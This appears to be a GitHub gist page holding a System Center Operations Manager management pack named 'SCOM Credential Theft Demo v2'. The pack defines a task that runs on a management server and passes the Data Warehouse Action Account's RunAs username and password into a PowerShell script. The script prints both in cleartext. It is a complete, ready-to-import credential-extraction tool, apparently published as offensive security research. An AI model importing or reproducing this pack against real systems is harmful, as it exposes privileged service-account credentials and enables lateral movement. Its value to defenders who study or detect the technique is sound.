Created
December 9, 2025 00:57
-
-
Save garrettfoster13/6f7c1ab27a5e39e1035e0f4399146a5e to your computer and use it in GitHub Desktop.
SCOM data warehouse action account extraction management pack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <ManagementPack SchemaVersion="2.0" ContentReadable="true" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> | |
| <Manifest> | |
| <Identity> | |
| <ID>Custom.SCOM.CredTheft.Demo2</ID> | |
| <Version>1.0.0.0</Version> | |
| </Identity> | |
| <Name>SCOM Credential Theft Demo v2</Name> | |
| <References> | |
| <Reference Alias="System"> | |
| <ID>System.Library</ID> | |
| <Version>7.5.8501.1</Version> | |
| <PublicKeyToken>31bf3856ad364e35</PublicKeyToken> | |
| </Reference> | |
| <Reference Alias="SC"> | |
| <ID>Microsoft.SystemCenter.Library</ID> | |
| <Version>10.22.10118.0</Version> | |
| <PublicKeyToken>31bf3856ad364e35</PublicKeyToken> | |
| </Reference> | |
| <Reference Alias="MSDL"> | |
| <ID>Microsoft.SystemCenter.DataWarehouse.Library</ID> | |
| <Version>7.5.8501.1</Version> | |
| <PublicKeyToken>31bf3856ad364e35</PublicKeyToken> | |
| </Reference> | |
| <Reference Alias="Windows"> | |
| <ID>Microsoft.Windows.Library</ID> | |
| <Version>7.5.8501.1</Version> | |
| <PublicKeyToken>31bf3856ad364e35</PublicKeyToken> | |
| </Reference> | |
| </References> | |
| </Manifest> | |
| <Monitoring> | |
| <Tasks> | |
| <Task ID="Custom.SCOM.CredTheft.Demo2.Task" Accessibility="Public" Target="SC!Microsoft.SystemCenter.ManagementServer" Enabled="true"> | |
| <Category>Custom</Category> | |
| <ProbeAction ID="Probe" TypeID="Windows!Microsoft.Windows.PowerShellProbe"> | |
| <ScriptName>DisplayCredentials.ps1</ScriptName> | |
| <ScriptBody><![CDATA[ | |
| Param( | |
| $USERNAME, | |
| $PASSWORD | |
| ) | |
| Write-Output "UserName: $USERNAME" | |
| Write-Output "Password: $PASSWORD" | |
| ]]></ScriptBody> | |
| <SnapIns /> | |
| <Parameters> | |
| <Parameter> | |
| <Name>USERNAME</Name> | |
| <Value>$RunAs[Name="MSDL!Microsoft.SystemCenter.DataWarehouse.ActionAccount"]/UserName$</Value> | |
| </Parameter> | |
| <Parameter> | |
| <Name>PASSWORD</Name> | |
| <Value>$RunAs[Name="MSDL!Microsoft.SystemCenter.DataWarehouse.ActionAccount"]/Password$</Value> | |
| </Parameter> | |
| </Parameters> | |
| <TimeoutSeconds>300</TimeoutSeconds> | |
| <StrictErrorHandling>false</StrictErrorHandling> | |
| </ProbeAction> | |
| </Task> | |
| </Tasks> | |
| </Monitoring> | |
| <LanguagePacks> | |
| <LanguagePack ID="ENU" IsDefault="true"> | |
| <DisplayStrings> | |
| <DisplayString ElementID="Custom.SCOM.CredTheft.Demo2"> | |
| <Name>SCOM Credential Theft Demo v2</Name> | |
| </DisplayString> | |
| <DisplayString ElementID="Custom.SCOM.CredTheft.Demo2.Task"> | |
| <Name>Display DW Credentials</Name> | |
| <Description>Extracts Data Warehouse RunAs credentials</Description> | |
| </DisplayString> | |
| </DisplayStrings> | |
| </LanguagePack> | |
| </LanguagePacks> | |
| </ManagementPack> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment